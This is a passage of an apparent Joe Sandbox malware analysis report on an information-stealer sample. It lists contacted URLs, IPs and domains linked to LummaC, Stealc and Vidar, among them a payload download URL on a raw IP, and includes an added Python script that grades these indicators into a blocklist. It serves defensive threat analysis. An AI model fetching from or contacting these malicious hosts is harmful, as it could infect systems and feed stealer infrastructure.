                                                                                                                                https://www.youtube.com/1A68.tmp.exe, 00000003.00000002.2433793949.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373597748.00000000009A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://store.steampowered.com/privacy_agreement/1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://post-to-me.com/track_prt.php?sub=rHrG691f7q.exefalse
                                                                                                                                        high
                                                                                                                                        https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://www.google.com/recaptcha/1A68.tmp.exe, 00000003.00000003.2373597748.00000000009A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://checkout.steampowered.com/1A68.tmp.exe, 00000003.00000003.2373597748.00000000009A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://post-to-me.com/rHrG691f7q.exe, 00000000.00000002.4623107198.0000000000A6E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://post-to-me.com/track_prt.php?sub=0&cc=DENrHrG691f7q.exe, 00000000.00000002.4623107198.0000000000A36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                unknown
                                                                                                                                                https://store.steampowered.com/;1A68.tmp.exe, 00000003.00000002.2433793949.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373597748.00000000009A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://store.steampowered.com/about/1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://steamcommunity.com/my/wishlist/1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://help.steampowered.com/en/1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://steamcommunity.com/market/1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://store.steampowered.com/news/1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://176.113.115.19/ScreenUpdateSync.exet3rHrG691f7q.exe, 00000000.00000003.2236621958.0000000000AA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://store.steampowered.com/subscriber_agreement/1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373631508.0000000000914000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
Name | Source | Malicious | Antivirus Detection | Reputation
https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org | 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmp | false |  | high
https://recaptcha.net/recaptcha/; | 1A68.tmp.exe, 00000003.00000002.2433793949.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373597748.00000000009A2000.00000004.00000020.00020000.00000000.sdmp | false |  | high
https://steamcommunity.com/discussions/ | 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://store.steampowered.com/stats/ | 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am | 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmp | false |  | high
https://medal.tv | 1A68.tmp.exe, 00000003.00000002.2433793949.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373597748.00000000009A2000.00000004.00000020.00020000.00000000.sdmp | false |  | high
https://broadcast.st.dl.eccdnx.com | 1A68.tmp.exe, 00000003.00000002.2433793949.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373597748.00000000009A2000.00000004.00000020.00020000.00000000.sdmp | false |  | high
https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png | 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a | 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmp | false |  | high
https://store.steampowered.com/steam_refunds/ | 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a | 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373631508.0000000000914000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmp | false |  | high
https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900 | 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016 | 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e | 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmp | false |  | high
https://steamcommunity.com/B | 1A68.tmp.exe, 00000003.00000003.2373734520.0000000000932000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373631508.0000000000930000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000002.2433686824.0000000000933000.00000004.00000020.00020000.00000000.sdmp | false |  | high
https://steamcommunity.com/workshop/ | 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://login.steampowered.com/ | 1A68.tmp.exe, 00000003.00000003.2373597748.00000000009A2000.00000004.00000020.00020000.00000000.sdmp | false |  | high
https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c | 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmp | false |  | high
https://store.steampowered.com/legal/ | 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373631508.0000000000914000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmp | false |  | high
https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en | 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmp | false |  | high
https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng | 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmp | false |  | high
https://effecterectz.xyz/api8 | 1A68.tmp.exe, 00000003.00000003.2327414310.000000000093D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a | 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmp | false |  | high
https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl | 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmp | false |  | high
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.22.222 | immureprech.biz | United States | 13335 | CLOUDFLARENETUS | false
104.21.96.1 | deafeninggeh.biz | United States | 13335 | CLOUDFLARENETUS | false
104.21.56.70 | post-to-me.com | United States | 13335 | CLOUDFLARENETUS | false
23.55.153.106 | steamcommunity.com | United States | 20940 | AKAMAI-ASN1EU | false
176.113.115.19 | unknown | Russian Federation | 49505 | SELECTELRU | false
Joe Sandbox version:41.0.0 Charoite
Analysis ID:1575138
Start date and time:2024-12-14 14:15:18 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 8m 51s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:14
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:rHrG691f7q.exe
renamed because original name is a hash value
Original Sample Name:f610013d7c84f779afa017218890e7ce.exe
Detection:MAL
Classification:mal100.troj.evad.winEXE@4/7@11/5
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 93%
• Number of executed functions: 42
• Number of non-executed functions: 326
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 20.198.119.143, 52.168.117.173, 20.190.147.10, 20.74.47.205, 13.107.246.63, 4.245.163.56, 20.190.181.3, 20.199.58.43, 150.171.27.10
• Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, client.wns.windows.com, otelrules.azureedge.net, slscr.update.microsoft.com, tse1.mm.bing.net, ctldl.windowsupdate.com, g.bing.com, arc.msn.com, fe3cr.delivery.mp.microsoft.com, wns.notify.trafficmanager.net, ocsp.digicert.com, login.live.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
08:16:18 | API Interceptor | 8220100x Sleep call for process: rHrG691f7q.exe modified
08:16:25 | API Interceptor | 6x Sleep call for process: 1A68.tmp.exe modified
08:16:40 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
IPs
Match         | Associated Sample Name / URL                                                        | Detection | Threat Name                                                        | Context
104.21.22.222 | TN78WX7nJU.exe                                                                      | malicious | LummaC                                                             |
104.21.22.222 | XIaCqh1vRm.exe                                                                      | malicious | LummaC                                                             |
104.21.22.222 | QQx0tdFC0b.exe                                                                      | malicious | LummaC                                                             |
104.21.22.222 | Dqw8QFydEX.exe                                                                      | malicious | LummaC                                                             |
104.21.22.222 | file.exe                                                                            | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar  |
104.21.22.222 | Loader.exe                                                                          | malicious | LummaC                                                             |
104.21.22.222 | Download-Roblox-Solara.exe                                                          | malicious | LummaC                                                             |
104.21.22.222 | adv.ps1                                                                             | malicious | LummaC                                                             |
104.21.22.222 | http://gerxx.ru                                                                     | malicious | Unknown                                                            |
104.21.22.222 | https://tdazl.fgfhgjyukh.top/?jul=17Y2Fzc2FuZHJhLmFwbGV5QHRoZXJtb2Zpc2hlci5jb20= | malicious | HTMLPhisher                                                        |
104.21.96.1   | SH8ZyOWNi2.exe                                                                      | malicious | CMSBrute                                                           | pelisplus.so/administrator/index.php
104.21.96.1   | Recibos.exe                                                                         | malicious | FormBook                                                           | www.mffnow.info/1a34/
104.21.56.70  | XIaCqh1vRm.exe                                                                      | malicious | LummaC                                                             |
104.21.56.70  | QQx0tdFC0b.exe                                                                      | malicious | LummaC                                                             |
104.21.56.70  | LXS5itpTK7.exe                                                                      | malicious | Stealc                                                             |
104.21.56.70  | ief722WreR.exe                                                                      | malicious | Stealc                                                             |
104.21.56.70  | 7gxaFDUSOD.exe                                                                      | malicious | Stealc                                                             |
104.21.56.70  | YQ3PhY2Aeq.exe                                                                      | malicious | Stealc, Vidar                                                      |
104.21.56.70  | vwkb5DQRAL.exe                                                                      | malicious | Stealc, Vidar                                                      |
104.21.56.70  | Tg3sk2wywR.exe                                                                      | malicious | Stealc                                                             |
104.21.56.70  | x8AH98H0eQ.exe                                                                      | malicious | Stealc                                                             |
104.21.56.70  | x8AH98H0eQ.exe                                                                      | malicious | Unknown                                                            |
Domains
Match              | Associated Sample Name / URL | Detection | Threat Name                                                                        | Context
immureprech.biz    | TN78WX7nJU.exe               | malicious | LummaC                                                                             | 104.21.22.222
immureprech.biz    | XIaCqh1vRm.exe               | malicious | LummaC                                                                             | 104.21.22.222
immureprech.biz    | QQx0tdFC0b.exe               | malicious | LummaC                                                                             | 104.21.22.222
immureprech.biz    | HIDE0RerES.exe               | malicious | LummaC                                                                             | 172.67.207.38
immureprech.biz    | Dqw8QFydEX.exe               | malicious | LummaC                                                                             | 104.21.22.222
immureprech.biz    | SET_UP.exe                   | malicious | LummaC                                                                             | 172.67.207.38
immureprech.biz    | file.exe                     | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar                  | 104.21.22.222
immureprech.biz    | Setup.exe                    | malicious | LummaC Stealer                                                                     | 172.67.207.38
immureprech.biz    | file.exe                     | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, Vidar | 172.67.207.38
immureprech.biz    | Loader.exe                   | malicious | LummaC                                                                             | 104.21.22.222
post-to-me.com     | TN78WX7nJU.exe               | malicious | LummaC                                                                             | 172.67.179.207
post-to-me.com     | XIaCqh1vRm.exe               | malicious | LummaC                                                                             | 104.21.56.70
post-to-me.com     | QQx0tdFC0b.exe               | malicious | LummaC                                                                             | 104.21.56.70
post-to-me.com     | LXS5itpTK7.exe               | malicious | Stealc                                                                             | 104.21.56.70
post-to-me.com     | SEejSLAS9f.exe               | malicious | Stealc                                                                             | 172.67.179.207
post-to-me.com     | EbXj93v3bO.exe               | malicious | Stealc                                                                             | 172.67.179.207
post-to-me.com     | ssB9bjDQPf.exe               | malicious | Stealc                                                                             | 172.67.179.207
post-to-me.com     | ief722WreR.exe               | malicious | Stealc                                                                             | 104.21.56.70
post-to-me.com     | 7gxaFDUSOD.exe               | malicious | Stealc                                                                             | 104.21.56.70
post-to-me.com     | YQ3PhY2Aeq.exe               | malicious | Stealc, Vidar                                                                      | 104.21.56.70
steamcommunity.com | TN78WX7nJU.exe               | malicious | LummaC                                                                             | 23.55.153.106
steamcommunity.com | XIaCqh1vRm.exe               | malicious | LummaC                                                                             | 104.102.49.254
steamcommunity.com | QQx0tdFC0b.exe               | malicious | LummaC                                                                             | 23.55.153.106
steamcommunity.com | HIDE0RerES.exe               | malicious | LummaC                                                                             | 104.102.49.254
steamcommunity.com | Dqw8QFydEX.exe               | malicious | LummaC                                                                             | 23.55.153.106
steamcommunity.com | 7VfKPMdmiX.exe               | malicious | Unknown                                                                            | 23.55.153.106
steamcommunity.com | 7VfKPMdmiX.exe               | malicious | Unknown                                                                            | 23.55.153.106
steamcommunity.com | SET_UP.exe                   | malicious | LummaC                                                                             | 23.55.153.106
steamcommunity.com | file.exe                     | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar                  | 23.55.153.106
steamcommunity.com | Setup.exe                    | malicious | LummaC Stealer                                                                     | 23.55.153.106
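One way to turn the IPs and Domains match tables above into a blocking decision, as an added example that is not part of the Joe Sandbox report: the rows are transcribed by hand from the two tables (a constructed subset, not a report export), joined on the resolved IP, and every indicator is then graded before it goes on a blocklist. The allowlist entry for steamcommunity.com and the Cloudflare prefix list are assumptions made here, not statements from the report; the family-name aliasing is a normalisation choice.

```python
"""Pivot the Domains and IPs match tables of a sandbox report into
infrastructure relationships and grade each indicator before blocking."""
import ipaddress
from collections import defaultdict
from dataclasses import dataclass, field

# Constructed input: rows transcribed by hand from the Domains table above,
# as (domain, sample, threat name, resolved IP). Not a report export.
DOMAIN_ROWS = [
    ("immureprech.biz", "TN78WX7nJU.exe", "LummaC", "104.21.22.222"),
    ("immureprech.biz", "HIDE0RerES.exe", "LummaC", "172.67.207.38"),
    ("immureprech.biz", "Setup.exe", "LummaC Stealer", "172.67.207.38"),
    ("immureprech.biz", "file.exe",
     "LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar",
     "104.21.22.222"),
    ("post-to-me.com", "TN78WX7nJU.exe", "LummaC", "172.67.179.207"),
    ("post-to-me.com", "LXS5itpTK7.exe", "Stealc", "104.21.56.70"),
    ("post-to-me.com", "YQ3PhY2Aeq.exe", "Stealc, Vidar", "104.21.56.70"),
    ("steamcommunity.com", "TN78WX7nJU.exe", "LummaC", "23.55.153.106"),
    ("steamcommunity.com", "XIaCqh1vRm.exe", "LummaC", "104.102.49.254"),
    ("steamcommunity.com", "7VfKPMdmiX.exe", "Unknown", "23.55.153.106"),
]
# Rows transcribed from the IPs table above, as (IP, sample or URL, threat name).
IP_ROWS = [
    ("104.21.22.222", "adv.ps1", "LummaC"),
    ("104.21.22.222", "http://gerxx.ru", "Unknown"),
    ("104.21.96.1", "SH8ZyOWNi2.exe", "CMSBrute"),
    ("104.21.96.1", "Recibos.exe", "FormBook"),
    ("104.21.56.70", "x8AH98H0eQ.exe", "Stealc"),
]
# Assumptions, not statements from the report: steamcommunity.com is a
# legitimate service, and these are Cloudflare's published reverse-proxy
# prefixes (the report's ASN table independently labels the 104.21.x and
# 172.67.x addresses CLOUDFLARENETUS).
ALLOWLIST = {"steamcommunity.com"}
CDN_PREFIXES = [ipaddress.ip_network(p)
                for p in ("104.16.0.0/13", "104.24.0.0/14", "172.64.0.0/13")]
# Normalisation choice: the tables spell the same family two ways.
ALIASES = {"LummaC Stealer": "LummaC"}


@dataclass
class Pivot:
    domain_to_ips: dict = field(default_factory=lambda: defaultdict(set))
    ip_to_domains: dict = field(default_factory=lambda: defaultdict(set))
    ip_to_families: dict = field(default_factory=lambda: defaultdict(set))


def parse_families(threat_name):
    """Split 'A, B, C' into a set of family names; 'Unknown' carries none."""
    fams = set()
    for raw in threat_name.split(","):
        name = ALIASES.get(raw.strip(), raw.strip())
        if name and name != "Unknown":
            fams.add(name)
    return fams


def build_pivot(domain_rows=DOMAIN_ROWS, ip_rows=IP_ROWS):
    """Join both tables on IP so each address carries every family seen on it."""
    p = Pivot()
    for domain, _sample, threat, ip in domain_rows:
        p.domain_to_ips[domain].add(ip)
        p.ip_to_domains[ip].add(domain)
        p.ip_to_families[ip] |= parse_families(threat)
    for ip, _sample, threat in ip_rows:
        p.ip_to_families[ip] |= parse_families(threat)
    return p


def is_cdn(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in CDN_PREFIXES)


def grade(pivot, allowlist=ALLOWLIST):
    """Verdict per indicator: 'allowlisted' (legitimate service, alert on the
    contacting process instead), 'block-domain' (block by name/SNI, the name
    moves between IPs), 'cdn-ip' (reverse proxy shared with other tenants),
    'shared-ip' (more than one family or domain on it), 'ip-candidate'."""
    verdicts = {}
    for domain in pivot.domain_to_ips:
        verdicts[domain] = "allowlisted" if domain in allowlist else "block-domain"
    for ip in set(pivot.ip_to_families) | set(pivot.ip_to_domains):
        fams, doms = pivot.ip_to_families[ip], pivot.ip_to_domains[ip]
        if doms & allowlist:
            verdicts[ip] = "allowlisted"
        elif is_cdn(ip):
            verdicts[ip] = "cdn-ip"
        elif len(fams) > 1 or len(doms) > 1:
            verdicts[ip] = "shared-ip"
        else:
            verdicts[ip] = "ip-candidate"
    return verdicts


def blocklist(verdicts):
    """Indicators safe to block outright: malicious domains and lone IPs only."""
    return ({k for k, v in verdicts.items() if v == "block-domain"},
            {k for k, v in verdicts.items() if v == "ip-candidate"})


if __name__ == "__main__":
    piv = build_pivot()
    for dom, ips in sorted(piv.domain_to_ips.items()):
        print(f"{dom:20} -> {sorted(ips)}")
    print(blocklist(grade(piv)))
```

Run against these rows, the blocklist comes out as the two domains and no IPs: immureprech.biz and post-to-me.com each resolve to two different Cloudflare addresses across the associated samples, and 104.21.56.70 carries Stealc and Vidar as well as LummaC, so an IP block would be both short-lived and noisy. steamcommunity.com and its two addresses are graded allowlisted; the useful signal there is which process opened the connection, not the destination.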
ASNs
Match           | Associated Sample Name / URL  | Detection | Threat Name                    | Context
CLOUDFLARENETUS | TN78WX7nJU.exe                | malicious | LummaC                         | 104.21.96.1
CLOUDFLARENETUS | XIaCqh1vRm.exe                | malicious | LummaC                         | 104.21.56.70
CLOUDFLARENETUS | PqCznDthHP.exe                | malicious | Edge Stealer                   | 104.26.13.205
CLOUDFLARENETUS | PO_0099822111ORDER.js         | malicious | Remcos                         | 104.21.84.67
CLOUDFLARENETUS | QQx0tdFC0b.exe                | malicious | LummaC                         | 104.21.56.70
CLOUDFLARENETUS | HIDE0RerES.exe                | malicious | LummaC                         | 172.67.207.38
CLOUDFLARENETUS | Dqw8QFydEX.exe                | malicious | LummaC                         | 104.21.112.1
CLOUDFLARENETUS | ORDER - 401.exe               | malicious | FormBook                       | 172.67.220.36
CLOUDFLARENETUS | order confirmation.exe        | malicious | FormBook                       | 104.21.90.137
CLOUDFLARENETUS | Shipment 990847575203.pdf.exe | malicious | Snake Keylogger, VIP Keylogger | 172.67.177.134

